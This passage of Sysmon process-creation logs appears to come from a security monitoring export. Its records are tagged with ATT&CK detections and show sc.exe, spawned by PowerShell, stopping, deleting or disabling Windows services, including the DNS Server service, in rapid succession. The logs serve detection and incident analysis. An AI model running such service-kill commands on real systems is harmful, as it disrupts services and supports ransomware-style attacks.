C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.964"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00103ca71900}"",""processId"":""7940"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.571",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.954 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-001072a61900} +ProcessId: 7916 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.956132500Z"",""eventRecordID"":""2189"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.954\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-001072a61900}\r\nProcessId: 7916\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.954"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-001072a61900}"",""processId"":""7916"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.542",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.912 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c1a31900} +ProcessId: 7836 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.914208600Z"",""eventRecordID"":""2186"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.912\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c1a31900}\r\nProcessId: 7836\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.912"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010c1a31900}"",""processId"":""7836"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.465",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:49:35.861 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010e4a01900} +ProcessId: 7764 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.863054700Z"",""eventRecordID"":""2183"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.861\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010e4a01900}\r\nProcessId: 7764\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.861"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010e4a01900}"",""processId"":""7764"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo 
-NoProfile""}}}", +"May 29, 2020 @ 14:18:04.451",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.847 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010fa9f1900} +ProcessId: 7740 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Serhiez Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Serhiez Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.848799700Z"",""eventRecordID"":""2182"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.847\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010fa9f1900}\r\nProcessId: 7740\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Serhiez Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.847"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010fa9f1900}"",""processId"":""7740"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Serhiez Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.385",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.817 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010109e1900} +ProcessId: 7688 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS 
Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.819041100Z"",""eventRecordID"":""2180"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.817\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010109e1900}\r\nProcessId: 7688\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.817"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010109e1900}"",""processId"":""7688"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.338",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.775 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00107f9b1900} +ProcessId: 7612 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.778027300Z"",""eventRecordID"":""2177"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.775\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00107f9b1900}\r\nProcessId: 7612\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
